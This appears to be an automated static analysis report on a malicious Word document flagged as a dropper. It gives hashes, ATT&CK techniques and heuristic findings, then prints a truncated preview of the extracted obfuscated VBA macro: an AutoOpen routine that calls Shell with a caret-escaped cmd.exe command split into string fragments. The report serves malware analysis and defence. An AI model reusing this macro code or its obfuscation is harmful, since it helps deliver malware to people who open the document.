Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9fff7343b067f08e…

MALICIOUS

Office (OLE)

Size: 88.2 KB
Created: 2018-08-31 07:53:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 513cdd81c94a8a2c7e1831818998b76c
SHA-1: 16ca1d47b8214c160e160ff34ee00901f9a75383
SHA-256: 9fff7343b067f08e84ff62c3c6c70d514847c19092a07b9d55c6b42025108ff0
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample contains a VBA macro with an AutoOpen subroutine that uses the Shell() function to execute a command. The macro assembles the command string from obfuscated, concatenated string fragments; the recovered fragment 'md /V :ON/C set 6mz=A' (once the caret characters, which cmd.exe strips as escape characters, are removed) indicates a command line that likely downloads and executes a secondary payload. The ClamAV detection 'Doc.Dropper.Chronos-6667983-0' further supports its classification as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Chronos-6667983-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Chronos-6667983-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8985 bytes
SHA-256: c27ad3740805e3f8b54039b6e6b087a281201ff8d6293f485046403e4948bbe3

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "pVibBMBFFJXu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()

On _
Error _
Resume _
Next
   Hour KpnEh / GhXTD / 34477 / FltJdh
   Hour 30843 / ZIrOD / HYoFU * GNMfbl
   Hour 87985 / CiHwVw * bSjOWr / 96299
   Hour JslXK * oCnuvr * bTldwd / oKLKFi
Shell KeyString(12 + 2 + 6 + 5 + 42) + mUmOJsMI + RAcwsXjmJz + fmZAcnS + wMOQWfkzLW + WuIDoD + jzZBfUbUN + YWnjTGTQ + IzwBXDFNnmST + HMtlvqmY, 0
   Hour pjVwIL * ubBMmR
End Sub



Attribute VB_Name = "IDVliiIBhQ"
Function fmZAcnS()

On _
Error _
Resume _
Next
Hour UOXdBO / KItJR * 21403 / uLuDUX
   Hour 30708 / HfWhf / lfXDoF / GfPvk
   Hour qNUbi * VLWnj
   Hour TJaLs * 24484
HnERDs = "md" + " /V" + "^:^O" + "N/C" + Chr(2 + 5 + 3 + 4 + 20) + "^s" + "^e^t" + " " + "^6m^z" + "=^A"
Hour WIvnwE * DXkJW / 98532 / wdwNAN
   Hour OwnOP / psZVL * 56959 / UFaLF
YiRoPkS = "^" + "AC" + "^A" + "gA" + "^A" + "^I^A" + "^ACAgA" + "^A^I^A" + "^AC" + "A^g^A" + "A^I" + "^A^AC" + "^"
Hour hBKvNw * XKZvqz * 89787 / 93983
nuOISsLcJn = "AgAAIA^" + "ACA" + "g^A^" + "A^I^A^" + "A" + "CA^" + "g" + "^A^QfA^" + "0H^A^" + "7BAa^A^" + "M^G^A0B" + "Q^YA^M"
Hour 63411 * dTBTPV * 28246 / QnBZIa
   Hour 80084 / OfLoKV * 93254 * XVBvJE
   Hour 30242 * bGWNz
aodmFimRI = "G^A" + "^9B^" + "wOA^" + "sG^Ah^B" + "Q^ZA" + "IHAiBw^" + "OAU^F" + "A" + "G^B^AR^" + "AQC" + "^A^g^A"
Hour AWOoU * Jwsuiv / OuYfs * fKidtk
   Hour 37106 * BIimm
wVllsVZDjVT = "^Q^bAU" + "G^A^0BQ" + "^S" + "A0C^" + "A^lB^w^" + "a^A"
Hour ZUErVP / 76967
   Hour FQdBn / IEPbw
YrPoOlRArz = "8^" + "G^A2^Bg" + "bA" + "k^" + "E" + "^A7" + "^" + "A^QKAU" + "^FA^G" + "BAR^" + "A^QCAg" + "^AA^L"
fmZAcnS = HnERDs + YiRoPkS + nuOISsLcJn + aodmFimRI + wVllsVZDjVT + YrPoOlRArz
   Hour vzjkN * COkYM * SkrEJ / 83185
   Hour tJiCRs * EUmqq / 53738 / hIrFq
End Function
Function wMOQWfkzLW()

On _
Error _
Resume _
Next
Hour 65552 * buzJz / DTSpj * iVJjq
   Hour 45290 * 54887 * 81202 * jsoKN
SLCzEUl = "^A^M" + "G^A^" + "WB^" + "wU" + "AQC" + "A^o^AQZ" + "A" + "^w^" + "GAp^Bg"
Hour MqvtY * hFrnrb
   Hour 28236 / 60485 * 28381 / TJdBUk
   Hour 86543 / bOjHUK
   Hour lMNiA * Qijap * Xjbku * zraon
   Hour 50650 * CnldYp
vBTud = "R^AQGAh" + "Bwb^A" + "^wG^A" + "^uB^" + "w" + "^d^A"
Hour 25020 * MwswZ * ESTdz * CzAAY
   Hour hKHhj / FIBsVE * 84737 / 74832
   Hour mbNQVj * GEcKAm / McXiN / wDOQz
lztJKnMpj = "^8GAE" + "^Bg^LA" + "cHA^j^B" + "^w^aAQ" + "C^A7B^" + "Q" + "^e^A" + "IH^A" + "^0^B^w^" + "eA^kC"
Hour WKmdjN * 94848
   Hour 97961 * VDTsYa / ziWQnH / pJcKpp
   Hour dmNjZ / HOqcdo
BQYWwZO = "A^1B" + "Q^" + "d^" + "AoH" + "^A" + "^kAAI^A" + "4^GA" + "p^B^AIA" + "M^G" + "^A^W" + "B^w^UAQ" + "C^A^"
Hour 44281 * QInAu * QSUwz * toOOT
   Hour 37655 / DYHVzM * 18039 / rhIFv
   Hour opzQRd * rsiCTz / 10648 * YwJSun
ArsIUVLqV = "oAAa" + "AM^G" + "^A^" + "hBQ^" + "ZAI^H"
Hour GLiLSs * 42021 / 44650 * 5142
   Hour 698 * MwdDS
   Hour 47276 * 69330
prXIBPnPlsn = "Av^B" + "^g^" + "ZA" + "s^D^A" + "n^AQZA" + "g" + "HAlB^g" + "L^Ac" + "C" + "^Ar^A^"
Hour ZoPNoX / FGnvr
   Hour 591 * RPPEA / 89840 / hAwPEh
czzEQvsGz = "QUAwG" + "^ATB^AJ" + "AsCAn" + "AA^XAcC" + "^"
Hour 42300 / Rqolzw
   Hour hXMoL * DplLTB
SqdsX = "Ar^" + "A^wY" + "Ak^G^A" + "s^B^g" + "^Y^A^U"
Hour DdjJf * AEKft
   Hour kBJJR * DdwvP * rsCzWw / BVWEjc
   Hour IpDPGl / zlmdz
bhwnYz = "^HA^wB^" + "gO^AY" + "H^A^u^B" + "Q^" + "ZAQCA" + "9A" + "QV^AY" + "^E^A^" + "E" + "^B^" + "AJ^"
wMOQWfkzLW = SLCzEUl + vBTud + lztJKnMpj + BQYWwZO + ArsIUVLqV + prXIBPnPlsn + czzEQvsGz + SqdsX + bhwnYz
   Hour 36932 / drwHRr * 12578 * 22413
   Hour 82549 * wZjvz / AOmkjr / sTcazt
End Function
Function WuIDoD()

On _
Error _
Resume _
Next
Hour tSAWa * 40310 / 21784 / 89753
   Hour qNFNd * IpocWC
RPiAisVszww = "A^s" + "DAn" + "^A^w" + "N^A^U^D" + "A" + "xAwJA^" + "A" + "CA9AA^" + "I^" + "AEF" + "^A^s^
... (truncated)